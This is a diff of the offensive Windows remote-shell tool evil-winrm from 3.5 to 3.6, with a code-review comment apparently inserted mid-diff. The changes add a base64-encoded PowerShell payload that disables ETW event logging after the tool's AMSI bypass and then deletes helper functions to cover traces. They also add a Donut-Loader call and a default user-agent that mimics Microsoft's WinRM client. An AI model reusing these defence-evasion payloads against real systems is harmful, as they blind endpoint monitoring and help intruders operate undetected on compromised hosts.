evil-winrm 3.5 → 3.6

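--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-metadata.gz: 015aebb85b6d61e430126ece28f4495fcc234d29cba5b9f11f187a551c4e4838
-data.tar.gz: b66a32f2f4ba1dfed745ddf67c005271b7ec8cedf5f8025467aa64504bf5fc16
+metadata.gz: 11cbf4c87fb485b3e75bba373489df758d42cb83e2f4241ac2050d49d47855cd
+data.tar.gz: dc27a65532ba270c3fe759f24596182f69964b38f3121f02b5012ffe1603b6ee
 SHA512:
-metadata.gz: f2984a00290ed3921b9d69cbc27a46e31555cbb46508dfc829f6ceb02b20e8317f4c7074f8c3974faebc951f16a90d1687e3011a4a3518371b7ee10970c48f26
-data.tar.gz: e41af05002e21a5628bddb5e86eefbecaf2913b0d1a119035725566d3ddcad0c73c2831b5030fb53bf0b23fecdfa2ca1ee4856b85c525f755dd76e1bec926be8
+metadata.gz: 3da2f100a245cbcfe9a14a50b72ccb900722204517d6db37abbb98cc90b48566abf4a7f4eff42d5a58f950e3ee9dc798fdeedb1af80678fe0310b62d7daa604f
+data.tar.gz: 94ff2e006ad6328cfc12975b7d79000dfb376c1bed5c0db90e85d45bb041941f8290ce7611ab817bcbc37b6fefcdc3e4432295f79f73ef62a03cac794b2efb56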
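--- a/data/evil-winrm.rb
+++ b/data/evil-winrm.rb
@@ -17,11 +17,12 @@ require 'io/console'
 require 'time'
 require 'fileutils'
 require 'logger'
+require 'shellwords'
 
 # Constants
 
 # Version
-VERSION = '3.5'
+VERSION = '3.6'
 
 # Msg types
 TYPE_INFO = 0
@@ -56,6 +57,7 @@ $password = ''
 $url = 'wsman'
 $default_service = 'HTTP'
 $full_logging_path = "#{Dir.home}/evil-winrm-logs"
+$user_agent = "Microsoft WinRM Client"
 
 # Redefine download method from winrm-fs
 module WinRM
@@ -64,7 +66,7 @@ module WinRM
 def download(remote_path, local_path, chunk_size = 1024 * 1024, first = true, size: -1)
 @logger.debug("downloading: #{remote_path} -> #{local_path} #{chunk_size}")
 index = 0
-return download_dir(remote_path, local_path, chunk_size, false) if remote_path.match?(/(\*\.|\*\*|\.\*|\*)/)
+return download_dir(remote_path, local_path, chunk_size, false) if remote_path.match?(/(\*\.?|\*\*|\.?\*|\*)/)
 output = _output_from_file(remote_path, chunk_size, index)
 return download_dir(remote_path, local_path, chunk_size, true) if output.exitcode == 2
 return false if output.exitcode >= 1
@@ -89,7 +91,7 @@ module WinRM
 end
 
 def download_dir(remote_path, local_path, chunk_size, first)
-index_exp = remote_path.index(/(\*\.|\*\*|\.\*|\*)/) || 0
+index_exp = remote_path.index(/(\*\.?|\*\*|\.?\*|\*)/) || 0
 remote_file_path = remote_path
 
 if index_exp > 0
@@ -155,13 +157,16 @@ class EvilWinRM
 
 # Arguments
 def arguments
-options = { port: $port, url: $url, service: $service }
+options = { port: $port, url: $url, service: $service, user_agent: $user_agent }
 optparse = OptionParser.new do |opts|
-opts.banner = 'Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]'
+opts.banner = 'Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-a USERAGENT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]'
 opts.on('-S', '--ssl', 'Enable ssl') do |_val|
 $ssl = true
 options[:port] = '5986'
 end
+opts.on('-a', '--user-agent USERAGENT', 'Specify connection user-agent (default Microsoft WinRM Client)') do |val|
+options[:user_agent] = val
+end
 opts.on('-c', '--pub-key PUBLIC_KEY_PATH', 'Local path to public key certificate') do |val|
 options[:pub_key] = val
 end
@@ -253,6 +258,7 @@ class EvilWinRM
 $priv_key = options[:priv_key]
 $realm = options[:realm]
 $service = options[:service]
+$user_agent = options[:user_agent]
 unless $log.nil?
 
 FileUtils.mkdir_p $full_logging_path
@@ -289,7 +295,8 @@ class EvilWinRM
 no_ssl_peer_verification: true,
 transport: :ssl,
 client_cert: $pub_key,
-client_key: $priv_key
+client_key: $priv_key,
+user_agent: $user_agent
 )
 else
 WinRM::Connection.new(
@@ -297,7 +304,8 @@ class EvilWinRM
 user: $user,
 password: $password,
 no_ssl_peer_verification: true,
-transport: :ssl
+transport: :ssl,
+user_agent: $user_agent
 )
 end
 
@@ -308,14 +316,16 @@ class EvilWinRM
 password: '',
 transport: :kerberos,
 realm: $realm,
-service: $service
+service: $service,
+user_agent: $user_agent
 )
 else
 $conn = WinRM::Connection.new(
 endpoint: "http://#{$host}:#{$port}/#{$url}",
 user: $user,
 password: $password,
-no_ssl_peer_verification: true
+no_ssl_peer_verification: true,
+user_agent: $user_agent
 )
 end
 end
@@ -379,10 +389,10 @@ class EvilWinRM
 priv_key = priv_key.to_s
 if $ssl
 unless pub_key.empty? && priv_key.empty? then
-unless [pub_key, priv_key].all? {|f| File.exists?(f) } then
-print_message("Path to provided public certificate file \"#{pub_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exists?(pub_key)
+unless [pub_key, priv_key].all? {|f| File.exist?(f) } then
+print_message("Path to provided public certificate file \"#{pub_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exist?(pub_key)
 
-print_message("Path to provided private certificate file \"#{priv_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exists?(priv_key)
+print_message("Path to provided private certificate file \"#{priv_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exist?(priv_key)
 
 custom_exit(1)
 end
@@ -678,6 +688,7 @@ class EvilWinRM
 dest = ""
 source = ""
 paths = get_paths_from_command(command, pwd)
+
 if paths.length == 2
 dest = paths.pop
 source = paths.pop
@@ -759,6 +770,8 @@ class EvilWinRM
 load_executable = File.binread(load_executable)
 load_executable = Base64.strict_encode64(load_executable)
 output = shell.run("Donut-Loader -process_id #{pid} -donutfile #{load_executable}")
+else
+output = shell.run("Donut-Loader")
 end
 print(output.output)
 $logger&.info(output.output)
@@ -908,7 +921,7 @@ class EvilWinRM
 end
 
 def get_Bypass_4MSI
-bypass_template = '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'
+bypass_template = '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'
 dec_template = Base64.decode64(bypass_template)
 result = dec_template.gsub('$var1', generate_random_type_string)
 @bypass_amsi_words_random_case.each { |w| result.gsub!(w.to_s, random_case(w)) }
@@ -927,6 +940,12 @@ class EvilWinRM
 output = shell.run(bypass)
 if output.output.empty?
 print_message('[+] Success!', TYPE_SUCCESS, false)
+print_message('Patching ETW, please be patient ..', TYPE_INFO, true)
+patch_etw = Base64.decode64("W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkV2l0aFBhcnRpYWxOYW1lKCdTeXN0ZW0uQ29yZScpLkdldFR5cGUoJ1N5c3RlbS5EaWFnbm9zdGljcy5FdmVudGluZy5FdmVudFByb3ZpZGVyJykuR2V0RmllbGQoJ21fZW5hYmxlZCcsJ05vblB1YmxpYyxJbnN0YW5jZScpLlNldFZhbHVlKFtSZWZdLkFzc2VtYmx5LkdldFR5cGUoJ1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uVHJhY2luZy5QU0V0d0xvZ1Byb3ZpZGVyJykuR2V0RmllbGQoJ2V0d1Byb3ZpZGVyJywnTm9uUHVibGljLFN0YXRpYycpLkdldFZhbHVlKCksMCkK")
+output = shell.run(patch_etw)
+print_message('[+] Success!', TYPE_SUCCESS, false)
+output = shell.run("Remove-Item Function:getDelegateType")
+output = shell.run ("Remove-Item Function:LookupFunc")
 else
 puts(output.output)
 end
@@ -939,9 +958,8 @@ class EvilWinRM
 end
 
 def get_paths_from_command(command, pwd)
-parts = command.split
+parts = Shellwords.shellsplit(command)
 parts.delete_at(0)
-parts.each { |p| p.gsub!('"', '') }
 return parts
 end
 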
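Review bot: `Shellwords.shellsplit(command)` in get_paths_from_command raises ArgumentError on an unmatched quote, where the old `command.split` never raised, so a mistyped upload/download line now propagates an exception out of the parser instead of being treated as a malformed command; add a method-level handler before the final `end`, `rescue ArgumentError => e`, `print_message("Could not parse paths: #{e.message}", TYPE_ERROR, false)`, `[]`, so the caller's `paths.length == 2` check (visible in the earlier hunk) takes its existing failure path. Shellwords also applies POSIX escaping, so an unquoted backslash is consumed (`C:\Users\x` becomes `C:Usersx`) while a double-quoted path keeps its backslashes; if users are expected to type unquoted Windows paths this is a behavioural regression that at least the usage text should mention. The caller at `paths = get_paths_from_command(command, pwd)` sits in a method whose start and end lie outside this section. Separately, in the `@@ -927,6 +940,12 @@` hunk the second `print_message('[+] Success!', TYPE_SUCCESS, false)` is printed without inspecting `output.output`, unlike the check directly above it, so a failed run is reported as success.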
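--- a/metadata
+++ b/metadata
@@ -1,17 +1,17 @@
 --- !ruby/object:Gem::Specification
 name: evil-winrm
 version: !ruby/object:Gem::Version
-version: '3.5'
+version: '3.6'
 platform: ruby
 authors:
 - CyberVaca
 - OscarAkaElvis
 - Jarilaos
 - Arale61
-autorequire: 
+autorequire:
 bindir: bin
 cert_chain: []
-date: 2023-04-21 00:00:00.000000000 Z
+date: 2024-10-06 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
 name: fileutils
@@ -70,7 +70,7 @@ dependencies:
 version: '2.3'
 - - ">="
 - !ruby/object:Gem::Version
-version: 2.3.2
+version: 2.3.7
 type: :runtime
 prerelease: false
 version_requirements: !ruby/object:Gem::Requirement
@@ -80,7 +80,7 @@ dependencies:
 version: '2.3'
 - - ">="
 - !ruby/object:Gem::Version
-version: 2.3.2
+version: 2.3.7
 - !ruby/object:Gem::Dependency
 name: winrm-fs
 requirement: !ruby/object:Gem::Requirement
@@ -151,8 +151,8 @@ required_rubygems_version: !ruby/object:Gem::Requirement
 - !ruby/object:Gem::Version
 version: '0'
 requirements: []
-rubygems_version: 3.2.5
-signing_key: 
+rubygems_version: 3.3.15
+signing_key:
 specification_version: 4
 summary: Evil-WinRM
 test_files: []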